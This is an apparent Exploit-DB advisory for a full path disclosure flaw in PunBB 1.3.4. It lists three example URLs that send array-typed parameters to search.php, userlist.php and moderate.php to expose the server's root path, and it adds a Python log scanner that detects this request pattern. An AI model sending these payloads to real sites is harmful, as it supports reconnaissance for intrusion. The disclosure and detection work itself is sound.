Vendor: Punbb
By: SYSTEM_OVERIDE, OverSecurityCrew
CVSS: 4,3 (MEDIUM)
Type: Full Path Disclosure
CWE: 200
Product Name: Punbb
Affected Version From: 1.3.4
Affected Version To: 1.3.4
Patch Exists: NO
Related CWE: N/A
CPE: a:punbb:punbb:1.3.4
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2010

Punbb 1.3.4 Full Path Disclosure

The vulnerabilities are in the files /search.php, /userlist.php and moderate.php, which do not properly control the content of the variables keywords, author and get_host. An attacker can exploit this to find out the root path of a website.

Mitigation:

Ensure that the content of the variables keywords, author and get_host is properly controlled.

Exploit-DB raw data:

# Exploit Title: Punbb 1.3.4 Full Path Disclosure
# Date: 07/11/2010
# Author: SYSTEM_OVERIDE, OverSecurityCrew
# Software Link: http://punbb.informer.com/
# Vulnerability Type: Full Path Disclosure
# Version: 1.3.4


Vulnerability Details:

The vulnerabilities are in the files /search.php, /userlist.php and moderate.php, which do not properly control the content of the variables keywords, author and get_host.
An attacker can exploit this to find out the root path of a website.

Example:

http://www.site.com/[path]/search.php?action=search&keywords[]=&author[]=&search_in=all&sort_by=0&SORT_DAshow_as=DESC&topics=&search=Submit+search
http://www.site.com/[path]/userlist.php?username[]=&show_group=-1&sort_by=username&sort_dir=ASC&search=Avvia+ricerca
http://www.site.com/[path]/moderate.php?get_host[]=


#SYSTEM_OVERIDE [07-11-2010]
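
Since no patch is listed, one way to spot this request shape in web server logs is sketched below. It is an added example, not part of the original advisory or of PunBB. It flags requests to the three scripts whose watched parameters arrive in the bracketed `name[]=` form shown in the example URLs, including percent-encoded brackets. The combined log format, the `WATCHED` map, the function names and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import urlsplit, unquote_plus

# Scripts and parameters named in the advisory; "username" appears only in its example URL.
WATCHED = {
    "search.php": {"keywords", "author"},
    "userlist.php": {"username"},
    "moderate.php": {"get_host"},
}
# Request part of a combined-format access log line (assumed format).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
# A parameter name written with bracket syntax: base[...]
ARRAY_NAME_RE = re.compile(r"([^\[\]]+)\[[^\]]*\]")


def array_params(target):
    """Return the sorted watched parameters that were sent as name[...]."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1].lower()
    watched = WATCHED.get(script)
    if not watched:
        return []
    hits = set()
    for pair in parts.query.split("&"):
        # Decode the name so percent-encoded brackets (%5B%5D) are caught too.
        name = unquote_plus(pair.split("=", 1)[0])
        match = ARRAY_NAME_RE.match(name)
        if match and match.group(1) in watched:
            hits.add(match.group(1))
    return sorted(hits)


def scan(lines):
    """Yield (line_number, request_target, parameters) for flagged log lines."""
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            params = array_params(match.group(1))
            if params:
                yield number, match.group(1), params


# Constructed sample log lines (not real traffic).
SAMPLE_LOG = [
    '192.0.2.10 - - [07/Nov/2010:10:00:01 +0000] "GET /forum/search.php?action=search&keywords=php&author=bob HTTP/1.1" 200 5120',
    '192.0.2.77 - - [07/Nov/2010:10:00:05 +0000] "GET /forum/search.php?action=search&keywords[]=&author%5B%5D= HTTP/1.1" 200 812',
    '192.0.2.77 - - [07/Nov/2010:10:00:06 +0000] "GET /forum/moderate.php?get_host[]= HTTP/1.1" 200 640',
    '192.0.2.10 - - [07/Nov/2010:10:00:09 +0000] "GET /forum/viewtopic.php?id[]=1 HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for number, target, params in scan(SAMPLE_LOG):
        print(f"line {number}: array-typed {', '.join(params)} in {target}")
```

Only parameters carried in the query string are visible to this check; values sent in a POST body do not appear in a standard access log.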